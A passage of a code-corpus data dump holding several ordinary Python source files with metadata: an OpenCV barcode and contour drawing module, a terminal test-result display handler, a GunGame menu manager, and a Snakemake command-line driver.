"name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "206606779", "text": "import cv2\nimport pyzbar.pyzbar as pyzbar\nimport numpy as np\n\n\n# 폰트 정보\nFONT_THICK = 2\nFONT_SIZE = 1\nFONT_COLOR = (200, 0, 200)\n\n\n# contours 그리기 위한 이미지 보정\ndef edit_for_contours(img):\n img_blur = cv2.GaussianBlur(img, (13, 13), 1)\n img_gray = cv2.cvtColor(img_blur, cv2.COLOR_BGR2GRAY)\n img_canny = cv2.Canny(img_gray, 50, 90)\n kernel = np.ones((5, 5))\n img_dil = cv2.dilate(img_canny, kernel, iterations=1)\n return img_dil\n\n\n# 바코드 번호 알아내기 위한 이미지 보정\ndef edit_for_barcode(img, cnt):\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n x1, y1 = np.min(cnt, axis=0)\n x2, y2 = np.max(cnt, axis=0)\n img_cut = img_gray[y1:y2, x1:x2]\n return img_cut\n\n\n# img 에서 contour 구한 뒤 img_contour 에 contour 그리기\ndef draw_contours(img_contour, img, area_min):\n # img 에서 contour 찾기\n contours, _ = cv2.findContours(img_contour, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n # contour box 좌표 정보\n result = []\n\n for cnt in contours:\n # contour 영역 구하기\n area = cv2.contourArea(cnt)\n\n # 최소 영역 이상일 때만 반복문 실행\n if area < area_min:\n continue\n\n # contour box 좌표 구하기\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n # contour box 그리기\n cv2.drawContours(img, [box], -1, (0, 0, 255), 2)\n\n # contour box 좌표 정보 추가\n result.append(box)\n\n # contour box 좌표 정보 반환\n return result\n\n\n# img_contour 에 x, y, z 정보 표시\ndef draw_xyz(img, xyz):\n cv2.putText(img, \"X: \"+str(xyz[0])+\"cm\", (5, 30), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n cv2.putText(img, \"Y: \"+str(xyz[1])+\"cm\", (5, 60), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n cv2.putText(img, \"Z: \"+str(xyz[2])+\"cm\", (5, 90), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n\n\n# img 에서 비코드 번호 구한 뒤 img_contour 에 바코드 정보 표시\ndef draw_barcode(img_barcode, img):\n barcodes = pyzbar.decode(img_barcode)\n\n cnt = 2\n # 결과 출력(탐지된 코드 타입, 데이터)\n for obj in barcodes:\n cv2.putText(img, \"Type : \"+obj.type, (5, (60*cnt)), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n cv2.putText(img, \"Data : \"+obj.data.decode('utf-8'), (5, (60*cnt)+30), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n print('Type : ', obj.type)\n print('Data : ', obj.data.decode('utf-8'))\n cnt += 1\n", "sub_path": "OpenCV_webcam/graphic.py", "file_name": "graphic.py", 
"file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.GaussianBlur", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.minAreaRect", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pyzbar.pyzbar.decode", "line_number": 71, "usage_type": "call"}, {"api_name": "pyzbar.pyzbar", "line_number": 71, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 76, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 77, "usage_type": "attribute"}]} +{"seq_id": "432843158", "text": "# (C) Steve Stagg\n\n\"\"\"\nColorful output showing multiprocess activity and status\n\"\"\"\n\nimport os\nimport itertools\nimport struct\nimport fcntl\nimport termios\nimport time\n\nimport subtest.color\nimport subtest.result\nimport subtest.handlers.path\n\n\nC = subtest.color.C\n\n\ndef ioctl_GWINSZ(fd):\n \"\"\"Ask the terminal directly what the window size is, Taken from\n http://stackoverflow.com/questions/566746/\n how-to-get-console-window-width-in-python\"\"\"\n try:\n cr = struct.unpack(\n 'hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))\n except:\n return None\n return cr\n\n\ndef terminal_size():\n cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)\n if not cr:\n try:\n fd = os.open(os.ctermid(), os.O_RDONLY)\n cr = ioctl_GWINSZ(fd)\n os.close(fd)\n except:\n pass\n if not cr:\n try:\n cr = (os.environ['LINES'], os.environ['COLUMNS'])\n except:\n cr = (25, 80)\n return int(cr[1]), int(cr[0])\n\n\nclass Handler(subtest.result.ResultHandler):\n\n DESCRIPTIONS = {\n \"success\": (\"OK\", \"OK\", \"OK\", C.green),\n \"fail\": (\"F\", \"Failure\", 
\"Failures\", C.red),\n \"error\": (\"E\", \"Error\", \"Errors\", C.red),\n \"expectedfail\": (\"x\", \"Expected Failure\",\n \"Expected Failures\", C.yellow),\n \"skip\": (\"s\", \"Skip\", \"Skipped\", C.blue),\n \"unhandled\": (\"u\", \"Unhandled\", \"Unhandled\", C.red),\n }\n TYPES = {\n subtest.handlers.path.PathTest: C.blue(\"D\"), # D for discovery\n subtest.handlers.unit.UnittestTest: C.green(\"t\"),\n }\n\n def __init__(self, *args, **kwargs):\n super(Handler, self).__init__(*args, **kwargs)\n self.first_output = None\n self.last_output = None\n self.total = 0\n self.counts = dict((name, 0) for name in self.DESCRIPTIONS.keys())\n self.running = []\n self.max_running = 0\n\n def ignore_result(self, test, result=None):\n return isinstance(test, subtest.handlers.path.PathTest)\n\n def _runners(self):\n parts = []\n self.max_running = max(len(self.running), self.max_running)\n for run in self.running:\n char = self.TYPES.get(run, C.yellow(\"?\"))\n parts.append(char)\n for i in range(self.max_running - len(parts)):\n parts.append(\" \")\n return \"[%s]\" % (\"\".join(parts)), 2 + len(parts)\n\n def _ansii_encode(self, code):\n return \"\\x1b[%s\" % code\n\n def format_counts(self, terse=False):\n parts = []\n char_count = 0\n total_name = \"T\" if terse else \"Tests\"\n char_count += len(\"%i %s\" % (self.total, total_name))\n parts.append(\"%s %s\" % (C.bold(str(self.total)), total_name))\n for name, count in self.counts.items():\n if count == 0:\n continue\n terse_desc, singular, plural, color = self.DESCRIPTIONS[name]\n if terse:\n desc = terse_desc\n elif count == 1:\n desc = singular\n else:\n desc = plural\n char_count += len(\", %i %s\" % (count, desc))\n parts.append(\", \" + color(\"%i %s\" % (count, desc)))\n char_count += 1\n return \"%s.\" % \"\".join(parts), char_count\n\n def update(self):\n data = [self._ansii_encode(\"0G\")]\n columns, rows = terminal_size()\n column = 0\n\n runners, runner_len = self._runners()\n data += runners\n data.append(\" \")\n column += runner_len + 1\n\n counts, count_len = self.format_counts()\n if column + count_len > columns:\n counts, count_len = self.format_counts(terse=True)\n data.append(counts)\n column += count_len\n\n data.append(self._ansii_encode(\"K\"))\n self.stream.write(\"\".join(data))\n self.stream.flush()\n\n def output(self, data, *more):\n self.stream.write(self._ansii_encode(\"0G\") + self._ansii_encode(\"K\"))\n for part in itertools.chain(data, more):\n self.stream.write(\"%s\\n\" % str(part))\n\n def report_result(self, bus, test, result, *data):\n assert result in self.ALLOWED_RESULTS, (\n \"%r test result not understood\" % (result, ))\n if self.ignore_result(test, result):\n return\n self.counts[result] += 1\n if len(data) > 0:\n self.output(data)\n self.update()\n\n def report_start(self, bus, test):\n if self.first_output is None:\n self.first_output = time.time()\n self.running.append(type(test))\n self.update()\n\n def report_stop(self, bus, test):\n self.running.remove(type(test))\n self.last_output = time.time()\n self.update()\n\n def report_test(self, bus, test):\n if not self.ignore_result(test):\n self.total += 1\n self.update()\n\n def report_totals(self, bus):\n message = \"Ran %s tests in %s seconds\" % (\n C.bold(str(self.total)), C.bold(\n \"%.2f\" % (self.last_output - self.first_output)))\n self.stream.write(\"\\n%s\\n\" % message)\n", "sub_path": "subtest/src/subtest/results/epic.py", "file_name": "epic.py", "file_ext": "py", "file_size_in_byte": 5118, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "subtest.color.color", "line_number": 19, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 19, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 27, "usage_type": "call"}, {"api_name": "fcntl.ioctl", "line_number": 28, "usage_type": "call"}, {"api_name": "termios.TIOCGWINSZ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.open", "line_number": 38, "usage_type": "call"}, {"api_name": "os.ctermid", "line_number": 38, "usage_type": "call"}, {"api_name": "os.O_RDONLY", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.close", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}, {"api_name": "subtest.color.result", "line_number": 51, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 51, "usage_type": "name"}, {"api_name": "subtest.color.handlers", "line_number": 63, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 63, "usage_type": "name"}, {"api_name": "subtest.color.handlers", "line_number": 64, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 64, "usage_type": "name"}, {"api_name": "subtest.color.handlers", "line_number": 77, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 77, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 135, "usage_type": "call"}, {"api_name": "time.time", "line_number": 150, "usage_type": "call"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "89205691", "text": "# ../core/menus/__init__.py\r\n\r\n'''\r\n$Rev$\r\n$LastChangedBy$\r\n$LastChangedDate$\r\n'''\r\n\r\n# =============================================================================\r\n# >> IMPORTS\r\n# =============================================================================\r\n# Python Imports\r\n# Path\r\nfrom path import path\r\n\r\n# Eventscripts Imports\r\n# ES\r\nfrom es import dbgmsg\r\n# Playerlib\r\nfrom playerlib import getUseridList\r\n# Popuplib\r\nfrom popuplib import Popup_popup\r\n\r\n# GunGame Imports\r\n# Messaging\r\nfrom gungame51.core.messaging.shortcuts import langstring\r\n\r\n\r\n# =============================================================================\r\n# >> GLOBAL VARIABLES\r\n# =============================================================================\r\n_menu_folder = path(__file__).parent\r\n\r\n\r\n# =============================================================================\r\n# >> CLASSES\r\n# =============================================================================\r\nclass MenuManager(object):\r\n '''\r\n Class for managing menus\r\n '''\r\n def __new__(cls, *p, **k):\r\n if not '_gg_menus' in cls.__dict__:\r\n cls._gg_menus = object.__new__(cls)\r\n cls._gg_menus.__loaded__ = {}\r\n\r\n return cls._gg_menus\r\n\r\n def load_menus(self):\r\n dbgmsg(0, langstring('Load_Commands'))\r\n for file_path in _menu_folder.files('*_menu.py'):\r\n self._load(file_path)\r\n\r\n def _load(self, file_path):\r\n name = file_path.namebase\r\n if name in self.__loaded__:\r\n raise NameError('GunGame menu \"%s\" is already loaded' % name)\r\n\r\n if not file_path.isfile():\r\n raise NameError('\"%s\" is not a valid menu name.' 
% name)\r\n\r\n        menuInstance = self.get_menu_by_name(name)\r\n        self.__loaded__[name] = menuInstance\r\n        self.call_block(menuInstance, 'load')\r\n\r\n    def unload_menus(self):\r\n        for name in self.__loaded__.keys():\r\n            self._unload(name)\r\n\r\n    def _unload(self, name):\r\n        menu_instance = self.get_menu_by_name(name)\r\n        self.call_block(menu_instance, 'unload')\r\n        del self.__loaded__[name]\r\n\r\n    def send(self, name, filter_type):\r\n        if name not in self.__loaded__:\r\n            raise NameError('\"%s\" is not a loaded menu name.' % name)\r\n\r\n        elif str(filter_type).isdigit():\r\n            menu_instance = self.get_menu_by_name(name)\r\n            self.call_block(menu_instance, 'send_menu', filter_type)\r\n\r\n        elif str(filter_type).startswith('#'):\r\n            for userid in getUseridList(filter_type):\r\n                self.send(name, userid)\r\n\r\n        else:\r\n            raise ValueError('\"%s\" is not a valid filter/userid' % filter_type)\r\n\r\n    def get_menu_by_name(self, name):\r\n        '''\r\n        Returns the module of an addon by name\r\n        '''\r\n        # If the menu is loaded we have stored the module\r\n        if name in self.__loaded__:\r\n            return self.__loaded__[name]\r\n\r\n        # If the menu is not loaded we need to import it\r\n        loadedMenu = __import__(('gungame51.core.menus.%s' % name),\r\n                                globals(), locals(), [''])\r\n\r\n        # We have to reload the module to re-instantiate the globals\r\n        reload(loadedMenu)\r\n        return loadedMenu\r\n\r\n    def call_block(self, menu_instance, blockname, *a, **kw):\r\n        \"\"\" Calls a block in a loaded sub-addon \"\"\"\r\n        menu_globals = menu_instance.__dict__\r\n        if blockname in menu_globals and callable(menu_globals[blockname]):\r\n            menu_globals[blockname](*a, **kw)\r\n\r\n\r\nclass OrderedMenu(object):\r\n    '''\r\n    Creates an ordered menu with continuous numbering throughout pages.\r\n    This class only creates single page popups, for the page the player has\r\n    requested. This way, it only makes a popup for requested pages. It stores\r\n    all of the data for the menu in the list \"items\".\r\n\r\n    Note: highlightIndex will highlight the item at its number in the menu.\r\n    Menu numbering starts at 1.\r\n    '''\r\n    def __init__(self, userid, title, items=[], options=10,\r\n                 highlightIndex=None):\r\n        self.userid = userid\r\n        self.title = title\r\n        self.items = items\r\n        self.options = options\r\n        self.highlightIndex = highlightIndex\r\n        self.totalPages = (\r\n            (len(items) / options) + (1 if len(items) % options > 0 else 0))\r\n\r\n    def send_page(self, page):\r\n        # If a page less than 1 is requested, send page 1\r\n        if page < 1:\r\n            page = 1\r\n        # If a page more than the total number of pages is requested, send the\r\n        # last page\r\n        elif page > self.totalPages:\r\n            page = self.totalPages\r\n\r\n        # Create a popup\r\n        popup = Popup_popup(\"OrderedMenu_p%s\" % page)\r\n        # Get the index of the first item on the current page\r\n        startIndex = (page - 1) * self.options\r\n        # Add the title\r\n        popup.addline(\"%s%s(%s/%s)\" % (self.title, \" \" * 5, page,\r\n                                       self.totalPages))\r\n        popup.addline(\"-----------------------------\")\r\n\r\n        # Add all of the options\r\n        for index in xrange(startIndex, startIndex + self.options):\r\n            # If it is the last page, and we are out of data, add empty lines\r\n            if index >= len(self.items):\r\n                popup.addline(\" \")\r\n                continue\r\n\r\n            # If the current index is the highlightIndex, add -> in front\r\n            highlight = \"->\" if index + 1 == self.highlightIndex else \"\"\r\n            # Add the line to the popup\r\n            popup.addline(\"%s%s. 
%s\" % (highlight, index + 1,\r\n self.items[index]))\r\n\r\n popup.addline(\"-----------------------------\")\r\n\r\n # Add the back and next buttons based on page number\r\n if page > 1:\r\n popup.addline(\"->8. Back\")\r\n else:\r\n popup.addline(\" \")\r\n\r\n if page < self.totalPages:\r\n popup.addline(\"->9. Next\")\r\n else:\r\n popup.addline(\" \")\r\n\r\n # Finish setting up the popup\r\n popup.addline(\"0. Exit\")\r\n # Have self.menuselect fire when the player makes a selection\r\n popup.menuselect = self.menuselect\r\n\r\n popup.timeout('view', 30)\r\n popup.timeout('send', 30)\r\n\r\n # Send the page\r\n popup.send(self.userid)\r\n\r\n def menuselect(self, userid, choice, popupName):\r\n # Get the page number from the popup name\r\n currentPage = int(popupName.replace(\"OrderedMenu_p\", \"\"))\r\n\r\n # Close the menu\r\n if choice == 10:\r\n return\r\n # Decrement the page number\r\n elif choice == 8:\r\n newPage = currentPage - 1\r\n self.send_page(newPage)\r\n # Increment the page number\r\n elif choice == 9:\r\n newPage = currentPage + 1\r\n self.send_page(newPage)\r\n # Resend the page\r\n else:\r\n self.send_page(currentPage)\r\n", "sub_path": "cstrike/addons/eventscripts/gungame51/core/menus/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7099, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "path.path", "line_number": 32, "usage_type": "call"}, {"api_name": "es.dbgmsg", "line_number": 50, "usage_type": "call"}, {"api_name": "gungame51.core.messaging.shortcuts.langstring", "line_number": 50, "usage_type": "call"}, {"api_name": "playerlib.getUseridList", "line_number": 84, "usage_type": "call"}, {"api_name": "popuplib.Popup_popup", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "510047692", "text": "\"\"\"\nCommand line interface driver for snakemake workflows\n\"\"\"\nimport argparse\nimport os.path\nimport snakemake\nimport sys\nimport yaml\nimport time\nimport shutil\nimport errno\n\n# read from __init__.py\nfrom . import __program__\nfrom . import __version__\nfrom . import __email__\nfrom . import __date__\nfrom . import __author__\n\n# global vars\nthisdir = os.path.abspath(os.path.dirname(__file__))\nparentdir = os.path.join(thisdir, \"..\")\ncwd = os.getcwd()\n\n# non-standard lib: For color handling on the shell\ntry:\n from colorama import init, Fore\n\n # INIT color\n # Initialise colours for multi-platform support.\n init()\n reset = Fore.RESET\n colors = {\n \"success\": Fore.GREEN,\n \"error\": Fore.RED,\n \"warning\": Fore.YELLOW,\n \"info\": \"\",\n }\nexcept ImportError:\n sys.stderr.write(\n \"colorama lib desirable. 
\" + 'Install with \"conda install colorama\".\\n\\n'\n )\n reset = \"\"\n colors = {\"success\": \"\", \"error\": \"\", \"warning\": \"\", \"info\": \"\"}\n\n\ndef alert(atype, text, log, repeat=False, flush=False):\n if repeat:\n textout = \"{} [{}] {}\\r\".format(\n time.strftime(\"%Y%m%d-%H:%M:%S\"), atype.rjust(7), text\n )\n else:\n textout = \"{} [{}] {}\\n\".format(\n time.strftime(\"%Y%m%d-%H:%M:%S\"), atype.rjust(7), text\n )\n\n log.write(\"{}{}{}\".format(colors[atype], textout, reset))\n if flush:\n log.flush()\n if atype == \"error\":\n sys.exit(1)\n\n\ndef success(text, log=sys.stderr, flush=True):\n alert(\"success\", text, log, flush=flush)\n\n\ndef error(text, log=sys.stderr, flush=True):\n alert(\"error\", text, log, flush=flush)\n\n\ndef warning(text, log=sys.stderr, flush=True):\n alert(\"warning\", text, log, flush=flush)\n\n\ndef info(text, log=sys.stderr, repeat=False, flush=True):\n alert(\"info\", text, log, repeat=repeat, flush=flush)\n\n\ndef print_logo():\n try:\n from pyfiglet import figlet_format\n\n text = figlet_format(__program__, font=\"slant\")\n except ImportError:\n text = \"\\n\\t\\t{}\\n\\n\".format(__program__)\n sys.stdout.write(\"{}\\n\".format(\"*\" * 60))\n sys.stdout.write(text)\n sys.stdout.write(\"version: {} date: {}\\n\".format(__version__, __date__))\n sys.stdout.write(\"Using executable at: {}\\n\".format(thisdir))\n sys.stdout.write(\"{}\\n\\n\".format(\"*\" * 60))\n\n\ndef parse_cmdline():\n description = \"An Snakemake command line interface for metafunc.\"\n version = \"version {}, date {}\".format(__version__, __date__)\n epilog = \"Copyright {} ({})\".format(__author__, __email__)\n\n parser = argparse.ArgumentParser(\n prog=__program__, description=description, epilog=epilog,\n )\n\n parser.add_argument(\"--version\", action=\"version\", version=\"{}\".format(version))\n\n subparsers = parser.add_subparsers(dest=\"subparser_name\")\n\n p_config = subparsers.add_parser(\"help\", description=\"Print help.\",)\n p_config = subparsers.add_parser(\n \"setup\",\n description=\"Generate a directory with example files \"\n + \"for a metafunc run.\",\n )\n p_config.add_argument(\n \"-n\",\n \"--name\",\n dest=\"directoryname\",\n default=\"example\",\n help='Directory name (not full path). [default: \"example\"]',\n )\n\n p_run = subparsers.add_parser(\n \"run\", description=\"Run metafunc analysis.\"\n )\n p_run.add_argument(\n \"configfile\",\n metavar=\"CONFIG-FILE\",\n help='Config-file. 
Generate example with \"metafunc setup\"',\n )\n p_run.add_argument(\"-n\", \"--dry-run\", action=\"store_true\")\n p_run.add_argument(\"-f\", \"--force\", action=\"store_true\")\n\n # if no arguments supplied print help\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n return args, parser\n\n\ndef copyanything(src, dst):\n try:\n shutil.copytree(src, dst)\n except OSError as exc: # python >2.5\n if exc.errno == errno.ENOTDIR:\n shutil.copy(src, dst)\n else:\n raise\n\n\ndef main(sysargs=sys.argv[1:]):\n print_logo()\n args, parser = parse_cmdline()\n\n if args.subparser_name == \"help\":\n parser.print_help()\n desc = \"\"\"\nDescription\n-----------\n\nRun `metafunc setup` to generate an example directory with\nresources to make a metafunc run.\n\nEnter the directory and edit the config.yaml file to your\nproject requirements.\n\nRun `metafunc run config.yaml` from within the created\ndirectory.\n\"\"\"\n\n sys.stdout.write(desc)\n sys.exit(0)\n\n elif args.subparser_name == \"setup\":\n dest = os.path.join(cwd, args.directoryname)\n sys.stdout.write(f\"{__program__} setup:\\n\")\n sys.stdout.write(\n \"\\tExecution time: {}\\n\".format(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n )\n sys.stdout.write(f\"\\tDestination: {dest}\\n\")\n sys.stdout.write(\"{}\\n\".format(\"*\" * 60))\n # test if already there\n if os.path.exists(dest):\n error(f'Destination example directory at \"{dest}\" already exists. EXIT.')\n\n src = os.path.join(thisdir, \"example\") \n copyanything(src, dest)\n success(\n f\"Example directory for a metafunc \"\n + f'run created at: \"{dest}\".'\n )\n return 0\n elif args.subparser_name == \"run\":\n # first, find the Snakefile\n snakefile_this = os.path.join(thisdir, \"Snakefile\")\n snakefile_parent = os.path.join(parentdir, \"Snakefile\")\n if os.path.exists(snakefile_this):\n snakefile = snakefile_this\n elif os.path.exists(snakefile_parent):\n snakefile = snakefile_parent\n else:\n msg = \"Error: cannot find Snakefile at any of the following locations:\\n\"\n msg += \"{}\\n\".format(snakefile_this)\n msg += \"{}\\n\".format(snakefile_parent)\n error(msg)\n\n # next, find the workflow params file\n if not os.path.exists(args.configfile):\n error(f\"Error: cannot find configfile {args.configfile}\\n. EXIT.\")\n\n sys.stdout.write(f\"{__program__} run:\\n\")\n sys.stdout.write(\n \"\\tExecution time: {}\\n\".format(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n )\n sys.stdout.write(f\"\\tSnakefile: {snakefile}\\n\")\n sys.stdout.write(f\"\\tConfig-file: {os.path.abspath(args.configfile)}\\n\")\n sys.stdout.write(\"{}\\n\".format(\"*\" * 60))\n\n config = yaml.safe_load(open(args.configfile))\n\n # run snakemake\n status = snakemake.snakemake(\n snakefile,\n configfiles=[args.configfile],\n printshellcmds=True,\n dryrun=args.dry_run,\n forceall=args.force,\n use_singularity=config[\"use_singularity\"],\n singularity_args=config[\"singularity_args\"],\n use_conda=config[\"use_conda\"],\n cores=config[\"cores\"],\n # config=config,\n )\n\n if status: # translate \"success\" into shell exit code of 0\n success(f\"Run finished successfully.\")\n return 0\n return 1\n else:\n error(\"Mode not recognized. 
EXIT\")\n return 1\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "metafunc/command.py", "file_name": "command.py", "file_ext": "py", "file_size_in_byte": 7112, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "os.path.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.getcwd", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}, {"api_name": "colorama.init", "line_number": 31, "usage_type": "call"}, {"api_name": "colorama.Fore.RESET", "line_number": 32, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 32, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 34, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 34, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 35, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 35, "usage_type": "name"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 36, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 36, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 40, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 50, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pyfiglet.figlet_format", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 87, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 88, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 90, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 91, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 99, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 133, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 135, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 143, "usage_type": "call"}, {"api_name": "errno.ENOTDIR", "line_number": 145, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 146, "usage_type": 
"call"}, {"api_name": "sys.argv", "line_number": 151, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 171, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 175, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 175, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 176, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 177, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 177, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 178, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 180, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 181, "usage_type": 